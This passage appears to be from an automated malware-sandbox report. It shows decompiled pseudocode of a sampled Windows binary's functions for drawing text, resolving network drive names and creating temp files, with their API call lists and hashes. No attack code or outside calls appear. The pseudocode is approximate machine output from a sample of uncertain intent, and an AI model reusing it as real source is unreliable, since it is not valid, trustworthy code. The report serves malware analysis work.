				void* __ebx;
				signed int _t16;
				void* _t21;
				void* _t29;
				signed int _t30;
				intOrPtr* _t31;
				void* _t32;
				signed int* _t33;

				_t33 = _t32 + 0xfffffff8;
				 *_t33 = __edx;
				_t31 = __eax;
				_v19 = 0;
				_t29 = E00402C00(__eax, 0xffef, __ecx, __eflags);
				if(_t29 != 0) {
					_t21 =  *((intOrPtr*)( *_t31 + 0x30))();
					_t16 = ( *_t33 ^ 0x00000001) & 0x0000007f;
					_push(_t16);
					_push(_t29);
					_push(_t21);
					L00405D0C();
					_t30 = _t16;
					_push(_t21);
					L00405CCC();
					if(_t16 != 0) {
						 *((intOrPtr*)( *_t31 + 0x44))();
					}
					_push(1);
					_push(_t30);
					_push(_t21);
					L00405D0C();
					_push(_t21);
					L00405CCC();
					_push(_t21);
					_push(_v36);
					L004060FC();
					_v47 = 1;
				}
				return _v7;
			}

0x004143cb
0x004143ce
0x004143d1
0x004143d3
0x004143e3
0x004143e7
0x004143f4
0x004143fb
0x004143fe
0x004143ff
0x00414400
0x00414401
0x00414406
0x00414408
0x00414409
0x00414410
0x00414416
0x00414416
0x00414419
0x0041441b
0x0041441c
0x0041441d
0x00414422
0x00414423
0x00414428
0x0041442d
0x0041442e
0x00414433
0x00414433
0x00414441

APIs

740BB410.GDI32(00000000,00000000,00000000), ref: 00414401
740BB150.GDI32(00000000,00000000,00000000,00000000), ref: 00414409
740BB410.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041441D
740BB150.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414423
740BB380.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041442E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: B150B410$B380
String ID:
API String ID: 2237492430-0
Opcode ID: 4d4dfbe96ba826e8f264f0e5d6029cd50952ac5696d8ac5b07e09d206b5e9ea0
Instruction ID: d6a8c37a96f406e62d9220a552f3636df258dcb6eaae1d75a6e4c5372ed043fd
Opcode Fuzzy Hash: 4d4dfbe96ba826e8f264f0e5d6029cd50952ac5696d8ac5b07e09d206b5e9ea0
Instruction Fuzzy Hash: 1401DF3521C3806AE200B63E8C85A9F6BEC8FCA714F05546EF098DB382CA7ACC018765

Uniqueness

Uniqueness Score: -1.00%

Function 00424CC8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00424CC8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				struct tagRECT _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				int _v72;
				int _v76;
				char _v80;
				struct tagRECT _v96;
				int _v100;
				char _v104;
				void _v120;
				char _v124;
				CHAR* _t153;
				void* _t183;
				intOrPtr _t202;
				intOrPtr* _t226;
				intOrPtr* _t228;
				void* _t232;

				_v124 = 0;
				_v32 = 0;
				asm("movsd");
				asm("movsd");
				_t183 = __eax;
				_push(_t232);
				_push(0x424f1a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t232 + 0xffffff88;
				 *((char*)(__eax + 0x38)) = 0;
				if( *((char*)(__eax + 0x64)) == 0 ||  *((intOrPtr*)(__eax + 0x40)) == 0 ||  *((intOrPtr*)(__eax + 0x60)) == 0 || E0041F05C() == 0) {
					L13:
					E00424CA0(_t183);
				} else {
					_t226 =  *((intOrPtr*)(_t183 + 0x40));
					_v80 = _t226;
					 *((intOrPtr*)( *_t226 + 0x28))();
					_v76 = _v104;
					_v72 = _v100;
					_v72 = _v72 +  *((intOrPtr*)( *((intOrPtr*)(_t183 + 0x40)) + 0x30)) + 6;
					_v68 = E00423190();
					_v64 =  *((intOrPtr*)(_t183 + 0x3c));
					E00414644( *((intOrPtr*)(_t183 + 0x40)),  &_v120);
					memcpy( &_v60,  &_v120, 4 << 2);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t183 + 0x40)))) + 0x28))();
					_t228 =  *((intOrPtr*)( *((intOrPtr*)(_t183 + 0x40)) + 0x20));
					if(_t228 == 0) {
						E0040AC08(0,  &_v28, 0);
					} else {
						 *((intOrPtr*)( *_t228 + 0x28))();
					}
					OffsetRect( &_v60, _v28 - _v20, _v24 - _v16);
					_t42 =  &_v12; // 0x424c5e
					E004147A4( *((intOrPtr*)(_t183 + 0x40)),  &_v104, _t42);
					_v44 = _v104;
					_v40 = _v100;
					E00423450( *((intOrPtr*)(_t183 + 0x40)),  &_v124);
					E00413914(_v124,  &_v104,  &_v32);
					_v33 = E00415228( *((intOrPtr*)(_t183 + 0x40)), 0, 0xb030,  &_v80) == 0;
					if(_v33 != 0 &&  *((short*)(_t183 + 0xc6)) != 0) {
						 *((intOrPtr*)(_t183 + 0xc4))( &_v80);
					}
					 *((char*)(_t183 + 0x38)) = _v33;
					if(_v33 == 0 || _v32 == 0) {
						goto L13;
					} else {
						E0040AC3C(0, _v68, 0,  &_v96, 0);
						_t153 = E00403738(_v32);
						DrawTextA(E0041B07C( *((intOrPtr*)( *((intOrPtr*)(_t183 + 0x60)) + 0xfc))), _t153, 0xffffffff,  &_v96, 0xc10);
						OffsetRect( &_v96, _v76, _v72);
						_v96.right = _v96.right + 6;
						_v96.bottom = _v96.bottom + 2;
						E00414778( *((intOrPtr*)(_t183 + 0x40)),  &_v104,  &_v60);
						 *((intOrPtr*)(_t183 + 0x44)) = _v104;
						 *((intOrPtr*)(_t183 + 0x48)) = _v100;
						E00414778( *((intOrPtr*)(_t183 + 0x40)),  &_v104,  &(_v60.right));
						 *((intOrPtr*)(_t183 + 0x4c)) = _v104;
						 *((intOrPtr*)(_t183 + 0x50)) = _v100;
						E00414C14( *((intOrPtr*)(_t183 + 0x60)), _v64);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t183 + 0x60)))) + 0x80))();
						E0042354C(_v32);
						E00424B14(_t183, 1,  *((intOrPtr*)(_t183 + 0x5c)));
					}
				}
				_pop(_t202);
				 *[fs:eax] = _t202;
				_push(0x424f21);
				E00403400( &_v124);
				return E00403400( &_v32);
			}

0x00424cd3
0x00424cd6
0x00424cde
0x00424cdf
0x00424ce0
0x00424ce4
0x00424ce5
0x00424cea
0x00424ced
0x00424cf0
0x00424cf8
0x00424ef5
0x00424ef7
0x00424d1f
0x00424d1f
0x00424d22
0x00424d2c
0x00424d32
0x00424d38
0x00424d44
0x00424d51
0x00424d57
0x00424d60
0x00424d70
0x00424d7a
0x00424d80
0x00424d85
0x00424d9a
0x00424d87
0x00424d8e
0x00424d8e
0x00424db1
0x00424db9
0x00424dbf
0x00424dc7
0x00424dcd
0x00424dd6
0x00424de1
0x00424dfb
0x00424e03
0x00424e1f
0x00424e1f
0x00424e28
0x00424e2f
0x00000000
0x00424e3f
0x00424e4c
0x00424e5f
0x00424e74
0x00424e85
0x00424e8a
0x00424e8e
0x00424e9b
0x00424ea3
0x00424ea9
0x00424eb5
0x00424ebd
0x00424ec3
0x00424ecc
0x00424edc
0x00424ee2
0x00424eee
0x00424eee
0x00424e2f
0x00424efe
0x00424f01
0x00424f04
0x00424f0c
0x00424f19

APIs

Part of subcall function 0041F05C: GetActiveWindow.USER32 ref: 0041F05F
Part of subcall function 0041F05C: GetCurrentThreadId.KERNEL32 ref: 0041F074
Part of subcall function 0041F05C: 740BAC10.USER32(00000000,Function_0001F038), ref: 0041F07A

Part of subcall function 00423190: GetSystemMetrics.USER32 ref: 00423192

OffsetRect.USER32(?,?,?), ref: 00424DB1
DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E74
OffsetRect.USER32(?,?,?), ref: 00424E85

Part of subcall function 0042354C: GetCurrentThreadId.KERNEL32 ref: 00423561
Part of subcall function 0042354C: SetWindowsHookExA.USER32 ref: 00423571
Part of subcall function 0042354C: CreateThread.KERNEL32 ref: 00423595

Part of subcall function 00424B14: SetTimer.USER32(00000000,00000001,?,0042349C), ref: 00424B2F

Strings

^LB, xrefs: 00424CDB, 00424DB9

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Thread$CurrentOffsetRect$ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
String ID: ^LB
API String ID: 1771318467-1568537117
Opcode ID: f0ee42d83cdc482020b724c1ab8bf6f75efb1fa829b450050cfecabafd34000c
Instruction ID: 1c571a2e0202a49c00b30b64db7fa21a714ef4218f88d48ac64b06535bd31de3
Opcode Fuzzy Hash: f0ee42d83cdc482020b724c1ab8bf6f75efb1fa829b450050cfecabafd34000c
Instruction Fuzzy Hash: A6812575A00218CFDB14DFA8C884ADEBBF4FF49304F51416AE805AB296EB78AD45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406F84 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156
shareCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00406F84(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v25;
				void* _v32;
				void* _v36;
				void _v1060;
				char _v1064;
				char _v1068;
				int _t76;
				void* _t113;
				intOrPtr _t116;
				signed int _t128;
				void* _t131;
				void* _t132;
				void* _t134;
				void* _t135;
				intOrPtr _t136;

				_t134 = _t135;
				_t136 = _t135 + 0xfffffbd8;
				_v1064 = 0;
				_v1068 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t134);
				_push(0x4071c8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t136;
				E00403494(_v12, _v8);
				if( *0x4980dc == 1) {
					_v25 = E004027B4( *_v8);
					if(_v25 >= 0x41 && _v25 <= 0x5a && E00403574(_v8) >= 3 &&  *((char*)(_v8 + 1)) == 0x3a &&  *((char*)(_v8 + 2)) == 0x5c && WNetOpenEnumA(1, 1, 0, 0,  &_v32) == 0) {
						 *[fs:edx] = _t136;
						_v20 = 0x640;
						_v36 = E00402648(_v20,  *[fs:edx], 0x4071a3, _t134);
						_push(_t134);
						_push(0x407185);
						_push( *[fs:edx]);
						 *[fs:edx] = _t136;
						while(1) {
							L10:
							_v16 = 0xffffffff;
							_v24 = _v20;
							_t76 = WNetEnumResourceA(_v32,  &_v16, _v36,  &_v24);
							if(_t76 == 0xea) {
								break;
							}
							if(_t76 == 0) {
								_t131 = _v16 - 1;
								if(_t131 < 0) {
									continue;
								} else {
									_t132 = _t131 + 1;
									_t128 = 0;
									while(1) {
										_t107 = _v36 + (_t128 << 2) * 8;
										if( *((intOrPtr*)(_v36 + (_t128 << 2) * 8 + 0x10)) != 0 && E004027B4( *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x10))))) == _v25) {
											break;
										}
										_t128 = _t128 + 1;
										_t132 = _t132 - 1;
										if(_t132 != 0) {
											continue;
										} else {
											goto L10;
										}
										goto L21;
									}
									E00403778(_v8, E00403574(_v8) - 2, 3,  &_v1064);
									_push(_v1064);
									E0040352C( &_v1068,  *((intOrPtr*)(_t107 + 0x14)));
									_pop(_t113);
									E004035C0(_v12, _t113, _v1068);
									E004031BC();
									E004031BC();
								}
							} else {
								E004031BC();
								E004031BC();
							}
							goto L21;
						}
						_v20 = _v24;
						E00402678( &_v36, _v20);
						goto L10;
					}
				} else {
					_v24 = 0x400;
					if(WNetGetUniversalNameA(E00403738(_v8), 1,  &_v1060,  &_v24) == 0) {
						E0040352C(_v12, _v1060);
					}
				}
				L21:
				_pop(_t116);
				 *[fs:eax] = _t116;
				_push(E004071CF);
				return E00403420( &_v1068, 2);
			}

0x00406f85
0x00406f87
0x00406f92
0x00406f98
0x00406f9e
0x00406fa1
0x00406fa6
0x00406fa7
0x00406fac
0x00406faf
0x00406fb8
0x00406fc4
0x0040700f
0x00407016
0x00407075
0x00407078
0x00407087
0x0040708c
0x0040708d
0x00407092
0x00407095
0x00407098
0x00407098
0x00407098
0x004070a2
0x004070b5
0x004070bf
0x00000000
0x00000000
0x004070d6
0x004070ea
0x004070ed
0x00000000
0x004070ef
0x004070ef
0x004070f0
0x004070f2
0x004070fa
0x00407101
0x00000000
0x00000000
0x00407163
0x00407164
0x00407165
0x00000000
0x00407167
0x00000000
0x00407167
0x00000000
0x00407165
0x0040712e
0x00407139
0x00407143
0x00407151
0x00407152
0x00407157
0x0040715c
0x0040715c
0x004070d8
0x004070d8
0x004070dd
0x004070dd
0x00000000
0x004070d6
0x004070c4
0x004070cd
0x00000000
0x004070cd
0x00406fc6
0x00406fc6
0x00406fea
0x00406ffb
0x00406ffb
0x00406fea
0x004071aa
0x004071ac
0x004071af
0x004071b2
0x004071c7

APIs

WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406FE3
WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040705D
WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070B5

Strings

Z, xrefs: 0040701C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Enum$NameOpenResourceUniversal
String ID: Z
API String ID: 3604996873-1505515367
Opcode ID: 8e45a508a275f8d19e1b220d08d314c4c2bdb250950aeca028ce3cb61823bc25
Instruction ID: fc3385a05c128efc50fcd669146f3a3a020ed707f27dd0bd8925003e0ff73f45
Opcode Fuzzy Hash: 8e45a508a275f8d19e1b220d08d314c4c2bdb250950aeca028ce3cb61823bc25
Instruction Fuzzy Hash: A3516070E04208ABDB11DF65C845A9EBBB9EF49304F1081BAE500BB3D1D778AE45CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0044C5F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0044C5F8(void* __eax, void* __ebx, signed char* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed char* _v12;
				signed int _v16;
				char _v20;
				struct tagRECT _v36;
				struct tagRECT _v52;
				signed int _t70;
				int _t76;
				CHAR* _t78;
				signed char _t82;
				int _t94;
				CHAR* _t96;
				void* _t105;
				intOrPtr _t119;
				intOrPtr _t122;
				int _t124;
				void* _t127;
				void* _t130;

				_v20 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t105 = __eax;
				_push(_t130);
				_push(0x44c77f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t130 + 0xffffffd0;
				_t127 = E0044D4B4(__eax);
				E0040AC20(0, E004146A4(_t105), 0,  &_v36, 0);
				_t70 =  *((intOrPtr*)(_t127 + 9));
				if( *((char*)(_t127 + 8)) != 0) {
					_t70 = 1;
				}
				_t122 =  *((intOrPtr*)(_t105 + 0x158));
				_v36.left = _v36.left + (_t122 + _t122 +  *((intOrPtr*)(_t105 + 0x148))) * _t70;
				_v36.left = _v36.left + 1;
				if( *((intOrPtr*)(_t127 + 0x14)) == 0) {
					_v36.right = _v36.right - _t122;
				} else {
					_v16 = 0xd20;
					if( *((char*)(_t105 + 0x184)) != 0) {
						_v16 = _v16 | 0x00020002;
					}
					SetRectEmpty( &_v52);
					_t94 = E00403574( *((intOrPtr*)(_t127 + 0x14)));
					_t96 = E00403738( *((intOrPtr*)(_t127 + 0x14)));
					DrawTextA(E0041B07C( *((intOrPtr*)(_t105 + 0x104))), _t96, _t94,  &_v52, _v16);
					_v36.right = _v36.right -  *((intOrPtr*)(_t105 + 0x158)) +  *((intOrPtr*)(_t105 + 0x158)) + _v52.right;
				}
				if( *((char*)(_t105 + 0x16c)) == 0) {
					_v36.left = _v36.left + 1;
				}
				_v16 = 0x40510;
				if( *((char*)(_t105 + 0x16c)) == 0 ||  *((char*)(_t127 + 8)) == 0) {
					_v16 = _v16 | 0x00000800;
				}
				if( *((char*)(_t105 + 0x184)) != 0) {
					_v16 = _v16 | 0x00020002;
				}
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t105 + 0xfc)))) + 0xc))();
				_t76 = E00403574(_v20);
				_t78 = E00403738(_v20);
				_t124 = DrawTextA(E0041B07C( *((intOrPtr*)(_t105 + 0x104))), _t78, _t76,  &_v36, _v16);
				 *((intOrPtr*)(_t127 + 0x38)) = _t124;
				_t82 =  *(_t105 + 0x154);
				if(_t124 >= _t82) {
					 *_v12 = _t124 + 4;
				} else {
					 *_v12 = _t82;
				}
				if(( *_v12 & 0x00000001) != 0) {
					 *_v12 =  *_v12 + 1;
				}
				_pop(_t119);
				 *[fs:eax] = _t119;
				_push(0x44c786);
				return E00403400( &_v20);
			}

0x0044c603
0x0044c606
0x0044c609
0x0044c60c
0x0044c610
0x0044c611
0x0044c616
0x0044c619
0x0044c626
0x0044c63b
0x0044c642
0x0044c649
0x0044c64b
0x0044c64b
0x0044c64c
0x0044c65f
0x0044c662
0x0044c669
0x0044c6c6
0x0044c66b
0x0044c66b
0x0044c679
0x0044c67b
0x0044c67b
0x0044c686
0x0044c696
0x0044c69f
0x0044c6b1
0x0044c6c1
0x0044c6c1
0x0044c6d0
0x0044c6d2
0x0044c6d2
0x0044c6d5
0x0044c6e3
0x0044c6eb
0x0044c6eb
0x0044c6f9
0x0044c6fb
0x0044c6fb
0x0044c710
0x0044c71e
0x0044c727
0x0044c73e
0x0044c740
0x0044c743
0x0044c74b
0x0044c75a
0x0044c74d
0x0044c750
0x0044c750
0x0044c762
0x0044c767
0x0044c767
0x0044c76b
0x0044c76e
0x0044c771
0x0044c77e

APIs

SetRectEmpty.USER32(?), ref: 0044C686
DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C6B1
DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C739

Strings

, xrefs: 0044C66B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DrawText$EmptyRect
String ID:
API String ID: 182455014-2867612384
Opcode ID: 376b7d392e2a7307553df1ab18c3ddb275d00b9527ede2d07debb28ed6b55a5f
Instruction ID: b63f043175787a44f28a4b43282f30ef61c1a1644475def0b68498de72d51a41
Opcode Fuzzy Hash: 376b7d392e2a7307553df1ab18c3ddb275d00b9527ede2d07debb28ed6b55a5f
Instruction Fuzzy Hash: 0D516171901244AFDB50DFA5C8C5BDEBBF9AF48304F09847AE845EB252D738A944CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0042EBCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042EBCC(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v16;
				char _v20;
				char _v24;
				struct HDC__* _t54;
				intOrPtr _t80;
				void* _t83;
				void* _t85;
				void* _t86;
				intOrPtr _t88;
				intOrPtr _t89;

				_t66 = __ecx;
				_t88 = _t89;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t83 = __ecx;
				_v8 = __edx;
				_t85 = __eax;
				_t65 = _a4;
				_push(_t88);
				_push(0x42ed20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_push(0);
				L00405F14();
				_v12 = 0;
				_push(_t88);
				_push(0x42ecfe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				SelectObject(_v12, E0041A1D0(_v8, _a4, __ecx, __ecx, __eax));
				E00403494(_a4, _t85);
				E0042C8F8( *_t65, _t66,  &_v20);
				E0042C8D0( *_t65, _t66,  &_v24);
				_t86 = E0042C618();
				if(_t86 < E00403574(_v20) && E0042C45C( *((intOrPtr*)(_v20 + _t86))) != 0) {
					_t86 = _t86 + 1;
				}
				E00403778(_v20, _t86, 1,  &_v16);
				E004037B8( &_v20, _t86, 1);
				while(_v20 != 0 || _v16 != 0) {
					if(_t83 < E0042E518(_v12, _t65, 0,  *_t65, _t83, _t86)) {
						if(_v20 != 0) {
							E0042EB18( &_v20, _t65, _t83, _t86);
						}
						if(_v20 == 0 && _v16 != 0) {
							E00403400( &_v16);
							E00403494( &_v20, 0x42ed38);
						}
						_push(_v16);
						_push(_v20);
						_push(_v24);
						E00403634();
						continue;
					}
					break;
				}
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x42ed05);
				_t54 = _v12;
				_push(_t54);
				_push(0);
				L004060FC();
				return _t54;
			}

0x0042ebcc
0x0042ebcd
0x0042ebcf
0x0042ebd1
0x0042ebd3
0x0042ebd5
0x0042ebd7
0x0042ebd9
0x0042ebda
0x0042ebdb
0x0042ebdc
0x0042ebde
0x0042ebe1
0x0042ebe3
0x0042ebe8
0x0042ebe9
0x0042ebee
0x0042ebf1
0x0042ebf4
0x0042ebf6
0x0042ebfb
0x0042ec00
0x0042ec01
0x0042ec06
0x0042ec09
0x0042ec19
0x0042ec22
0x0042ec2c
0x0042ec36
0x0042ec43
0x0042ec4f
0x0042ec60
0x0042ec60
0x0042ec6f
0x0042ec7e
0x0042ecc9
0x0042ece3
0x0042ec89
0x0042ec8e
0x0042ec8e
0x0042ec97
0x0042eca2
0x0042ecaf
0x0042ecaf
0x0042ecb4
0x0042ecb7
0x0042ecba
0x0042ecc4
0x00000000
0x0042ecc4
0x00000000
0x0042ece3
0x0042ece7
0x0042ecea
0x0042eced
0x0042ecf2
0x0042ecf5
0x0042ecf6
0x0042ecf8
0x0042ecfd

APIs

740BAC50.USER32(00000000,00000000,0042ED20,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EBF6

Part of subcall function 0041A1D0: CreateFontIndirectA.GDI32(?), ref: 0041A28F

SelectObject.GDI32(?,00000000), ref: 0042EC19
740BB380.USER32(00000000,?,0042ED05,00000000,0042ECFE,?,00000000,00000000,0042ED20,?,?,?,?,00000000,00000000,00000000), ref: 0042ECF8

Strings

...\, xrefs: 0042ECAA

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: B380CreateFontIndirectObjectSelect
String ID: ...\
API String ID: 1304862298-983595016
Opcode ID: 4846ec47f17ee5488c6e9c950676fef11b8ee2913f3253d1a52955b7ccb3cf08
Instruction ID: 7453103fbe016f60fab338fca086c32b62f357f47d6b07848e938ab02232d348
Opcode Fuzzy Hash: 4846ec47f17ee5488c6e9c950676fef11b8ee2913f3253d1a52955b7ccb3cf08
Instruction Fuzzy Hash: D9316F70B00229ABDB11EB9BD841BAEB7B9EB48308F91447AF410A7291D7785E01CA59

Uniqueness

Uniqueness Score: -1.00%

Function 00452C1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00452C1C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				signed int _v20;
				char _v24;
				char _v28;
				void* _t62;
				signed int _t65;
				intOrPtr _t79;
				void* _t84;
				void* _t87;

				_t66 = 0;
				_v24 = 0;
				_v28 = 0;
				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00403728(_v8);
				_push(_t87);
				_push(0x452d56);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe8;
				E0042C3E4(_v8,  &_v24);
				E00403494( &_v8, _v24);
				_t84 = 0x123456;
				_t65 = 0;
				_v13 = 0;
				do {
					_t84 = _t84 + 1;
					if(_t84 > 0x1ffffff) {
						_t84 = 0;
					}
					_t92 = 0x123456 - _t84;
					if(0x123456 == _t84) {
						E0042CB64(_v8, _t66,  &_v28, _t92);
						E004507B8(0x45,  &_v24, _v28);
						_t66 = _v24;
						E00408BEC(_v24, 1);
						E0040311C();
					}
					_push(_v8);
					_push("\nI");
					E00452A9C(_t84, _t65,  &_v24, 0x123456, _t84);
					_push(_v24);
					_push(".tmp");
					E00403634();
					if(E0042CCEC(_t92) == 0) {
						_t65 = 1;
						_v13 = E0042CCC8(_v20);
						if(_v13 != 0) {
							_t62 = CreateFileA(E00403738(_v20), 0xc0000000, 0, 0, 2, 0x80, 0);
							_t65 = 0 | _t62 != 0xffffffff;
							if(1 != 0) {
								CloseHandle(_t62);
							}
						}
					}
				} while (_t65 == 0);
				E00403450(_v12, _t65, _v20, 0x123456, _t84);
				_pop(_t79);
				 *[fs:eax] = _t79;
				_push(E00452D5D);
				E00403420( &_v28, 3);
				return E00403400( &_v8);
			}

0x00452c25
0x00452c27
0x00452c2a
0x00452c2d
0x00452c30
0x00452c33
0x00452c39
0x00452c40
0x00452c41
0x00452c46
0x00452c49
0x00452c52
0x00452c5d
0x00452c67
0x00452c69
0x00452c6b
0x00452c6f
0x00452c6f
0x00452c76
0x00452c78
0x00452c78
0x00452c7a
0x00452c7c
0x00452c84
0x00452c91
0x00452c96
0x00452ca0
0x00452ca5
0x00452ca5
0x00452caa
0x00452cad
0x00452cb7
0x00452cbc
0x00452cbf
0x00452ccc
0x00452cdb
0x00452cdd
0x00452ce7
0x00452cee
0x00452d0b
0x00452d13
0x00452d18
0x00452d1b
0x00452d1b
0x00452d18
0x00452cee
0x00452d20
0x00452d2e
0x00452d35
0x00452d38
0x00452d3b
0x00452d48
0x00452d55

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004950B1,\nI,?,00000000,00452D56), ref: 00452D0B
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004950B1,\nI,?,00000000,00452D56), ref: 00452D1B

Strings

\nI, xrefs: 00452CAD
.tmp, xrefs: 00452CBF

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: .tmp$\nI
API String ID: 3498533004-1657403358
